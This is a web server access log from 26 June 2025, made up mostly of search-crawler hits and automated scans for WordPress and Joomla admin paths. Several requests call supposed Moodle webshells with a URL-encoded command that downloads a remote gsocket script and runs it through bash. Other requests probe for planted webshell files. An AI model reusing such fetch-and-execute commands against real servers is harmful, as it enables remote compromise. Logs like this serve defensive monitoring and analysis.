66.249.68.69 - - [26/Jun/2025:06:55:49 +0000] "GET /pipe-kada-design-or-s-36895938 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.45.194.165 - - [26/Jun/2025:07:31:36 +0000] "GET /admin HTTP/1.1" 200 3793 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:36:26 +0000] "GET //wp-includes/ID3/license.txt HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:36:31 +0000] "GET //feed/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:36:37 +0000] "GET //xmlrpc.php?rsd HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:36:45 +0000] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:36:51 +0000] "GET //web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:37:00 +0000] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:37:08 +0000] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:37:16 +0000] "GET //2020/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:37:27 +0000] "GET //2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:37:37 +0000] "GET //2021/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:37:54 +0000] "GET //shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:38:02 +0000] "GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:38:12 +0000] "GET //test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:38:19 +0000] "GET //site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:08:38:26 +0000] "GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
66.249.68.68 - - [26/Jun/2025:08:58:47 +0000] "GET /andro%C3%AFde-17-s-24810955 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [26/Jun/2025:09:01:03 +0000] "GET /andro%C3%AFde-17-s-24810955 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.69 - - [26/Jun/2025:09:12:18 +0000] "GET /drapeau-jama%C3%AFque-ss-13134788 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:09:25:49 +0000] "GET /drapeau-jama%C3%AFque-ss-13134788 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [26/Jun/2025:09:50:36 +0000] "GET /valises-cabine-rigides-low-cost-travel-world-%C3%A0-39-ss-36252639 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
5.189.177.19 - - [26/Jun/2025:09:51:24 +0000] "GET /administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:09:51:24 +0000] "GET /administrator/index.php HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:09:51:24 +0000] "GET /admin/ HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:09:51:25 +0000] "GET /joomla/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:09:51:26 +0000] "GET /cms/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:09:51:26 +0000] "GET /site/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:09:51:27 +0000] "GET /administrator/index2.php HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:09:51:27 +0000] "GET /web/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:09:51:28 +0000] "GET /en/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:09:51:28 +0000] "GET /portal/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
66.249.68.68 - - [26/Jun/2025:09:52:51 +0000] "GET /valises-cabine-rigides-low-cost-travel-world-%C3%A0-39-ss-36252639 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [26/Jun/2025:10:05:28 +0000] "GET /?p=mz/O610566.html HTTP/1.1" 200 12905 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.189.177.19 - - [26/Jun/2025:10:09:36 +0000] "GET /index.php/?administrator/ HTTP/1.1" 200 12832 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:10:09:37 +0000] "GET /index.php/index.php?administrator/index.php HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:10:09:38 +0000] "GET /index.php/?admin/ HTTP/1.1" 200 12928 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:10:09:40 +0000] "GET /index.php/administrator/?joomla/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:10:09:40 +0000] "GET /index.php/administrator/?cms/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:10:09:42 +0000] "GET /index.php/administrator/?site/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:10:09:43 +0000] "GET /index.php/index2.php?administrator/index2.php HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:10:09:43 +0000] "GET /index.php/administrator/?web/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:10:09:44 +0000] "GET /index.php/administrator/?en/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
5.189.177.19 - - [26/Jun/2025:10:09:45 +0000] "GET /index.php/administrator/?portal/administrator/ HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
139.99.34.216 - - [26/Jun/2025:10:50:21 +0000] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 1130 "-" "python-requests/2.32.4"
139.99.34.216 - - [26/Jun/2025:10:50:32 +0000] "GET /index.php/moodle_webshell/webshell.php?local/moodle_webshell/webshell.php HTTP/1.1" 404 1130 "-" "python-requests/2.32.4"
139.99.34.216 - - [26/Jun/2025:10:50:44 +0000] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 1130 "-" "python-requests/2.32.4"
139.99.34.216 - - [26/Jun/2025:10:50:52 +0000] "GET /index.php/rce/lang/en/block_rce.php?blocks/rce/lang/en/block_rce.php HTTP/1.1" 404 1130 "-" "python-requests/2.32.4"
139.99.34.216 - - [26/Jun/2025:10:51:03 +0000] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 1130 "-" "python-requests/2.32.4"
139.99.34.216 - - [26/Jun/2025:10:51:08 +0000] "GET /index.php/blocks/rce/lang/en/block_rce.php?moodle/blocks/rce/lang/en/block_rce.php HTTP/1.1" 404 1130 "-" "python-requests/2.32.4"
139.99.34.216 - - [26/Jun/2025:10:51:18 +0000] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 1130 "-" "python-requests/2.32.4"
139.99.34.216 - - [26/Jun/2025:10:51:25 +0000] "GET /index.php/local/moodle_webshell/webshell.php?moodle/local/moodle_webshell/webshell.php HTTP/1.1" 404 1130 "-" "python-requests/2.32.4"
66.249.68.69 - - [26/Jun/2025:10:57:10 +0000] "GET /robots.txt HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [26/Jun/2025:10:57:11 +0000] "GET /brochettes-de-veau-marin%C3%89es-ss-49031373 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [26/Jun/2025:11:01:33 +0000] "GET /drac%C3%A9na-limon-lime-ss-38076076 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.69 - - [26/Jun/2025:11:02:03 +0000] "GET /drac%C3%A9na-limon-lime-ss-38076076 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [26/Jun/2025:11:16:33 +0000] "GET /boulon-de-pierre-de-per%C3%A7age-automatique-en-acier-filet%C3%A9-ss-7562633 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:11:16:48 +0000] "GET /boulon-de-pierre-de-per%C3%A7age-automatique-en-acier-filet%C3%A9-ss-7562633 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [26/Jun/2025:11:18:33 +0000] "GET /magasins-de-studios-d-acn%C3%A9/acne-paper-acne-studios-livre-16-allanjoseph-ss-39750799 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:11:18:47 +0000] "GET /magasins-de-studios-d-acn%C3%A9/acne-paper-acne-studios-livre-16-allanjoseph-ss-39750799 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [26/Jun/2025:11:20:32 +0000] "GET /brochettes-de-veau-marin%C3%89es-ss-49031373 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.67 - - [26/Jun/2025:11:27:00 +0000] "GET /ibm-thinkpad-r52-sous-windows-ram-go-n%C2%B0021305-grade-ss-6727022 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:11:27:07 +0000] "GET /ibm-thinkpad-r52-sous-windows-ram-go-n%C2%B0021305-grade-ss-6727022 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [26/Jun/2025:11:43:53 +0000] "GET /bear-porter-ses-fruits-yoyos-fraise-multipack-x-20g-ss-18112028 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.69 - - [26/Jun/2025:11:44:01 +0000] "GET /bear-porter-ses-fruits-yoyos-fraise-multipack-x-20g-ss-18112028 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:12:02:41 +0000] "GET /sub-bass-sb-18-l-acoustics-c-e-c-ss-4398109 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.67 - - [26/Jun/2025:12:02:56 +0000] "GET /sub-bass-sb-18-l-acoustics-c-e-c-ss-4398109 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [26/Jun/2025:12:24:12 +0000] "GET /buffet-portes-en-ch%C3%AAne-massif-de-style-campagnard-meuble-ss-9000771 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:12:24:12 +0000] "GET /buffet-portes-en-ch%C3%AAne-massif-de-style-campagnard-meuble-ss-9000771 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [26/Jun/2025:12:26:32 +0000] "GET /set-de-couteaux-%C3%A0-steak-claveles-kobe-11-5cm-ss-6332112 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.68 - - [26/Jun/2025:12:26:56 +0000] "GET /set-de-couteaux-%C3%A0-steak-claveles-kobe-11-5cm-ss-6332112 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.90.149.55 - - [26/Jun/2025:13:05:55 +0000] "GET /index.php?ova-wp-exp.php HTTP/1.1" 200 12854 "http://alumni.dbcollege.ac.in" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.90.149.55 - - [26/Jun/2025:13:09:35 +0000] "GET /index.php/plugins/wp-ver.php?wp-content/plugins/wp-ver.php HTTP/1.1" 404 1130 "https://www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.90.149.55 - - [26/Jun/2025:13:09:36 +0000] "GET /index.php/wp-ver.php?wp-content/wp-ver.php HTTP/1.1" 404 1130 "https://www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.90.149.55 - - [26/Jun/2025:13:09:37 +0000] "GET /index.php?wp-ver.php HTTP/1.1" 200 12852 "https://www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.90.149.55 - - [26/Jun/2025:13:09:38 +0000] "POST /wp-content/plugins/wp-term.php HTTP/1.1" 403 1131 "https://www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.90.149.55 - - [26/Jun/2025:13:09:39 +0000] "POST /wp-content/wp-term.php HTTP/1.1" 403 1131 "https://www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.90.149.55 - - [26/Jun/2025:13:09:40 +0000] "POST /wp-term.php HTTP/1.1" 403 1131 "https://www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
66.249.68.68 - - [26/Jun/2025:13:16:28 +0000] "GET /trousse-de-secours-%C3%A0-rabat-en-toile-vide-verte-ss-23894481 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [26/Jun/2025:13:16:41 +0000] "GET /trousse-de-secours-%C3%A0-rabat-en-toile-vide-verte-ss-23894481 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.67 - - [26/Jun/2025:13:47:28 +0000] "GET /fleur-sexy-mk-s-20164698 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [26/Jun/2025:13:48:50 +0000] "GET /fleur-sexy-mk-s-20164698 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.69 - - [26/Jun/2025:14:02:02 +0000] "GET /charm-pandora-corazon-amo-te-ss-47596084 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [26/Jun/2025:14:21:00 +0000] "GET /charm-pandora-corazon-amo-te-ss-47596084 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.67 - - [26/Jun/2025:14:50:47 +0000] "GET /the-hobbit-thorin-oakenshield-asmus-toys-ss-41937622 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.67 - - [26/Jun/2025:14:53:29 +0000] "GET /the-hobbit-thorin-oakenshield-asmus-toys-ss-41937622 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
34.196.237.236 - - [26/Jun/2025:15:58:16 +0000] "GET /Authentication/signUp HTTP/1.1" 200 10323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.68.69 - - [26/Jun/2025:16:12:01 +0000] "GET /eau-de-toilette-spray-60ml-ss-48832892 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.69 - - [26/Jun/2025:16:17:26 +0000] "GET /eau-de-toilette-spray-60ml-ss-48832892 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.68 - - [26/Jun/2025:16:56:34 +0000] "GET /jeans-slim-in-denim-di-cotone-stretch-ss-25056380 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.67 - - [26/Jun/2025:16:57:00 +0000] "GET /jeans-slim-in-denim-di-cotone-stretch-ss-25056380 HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
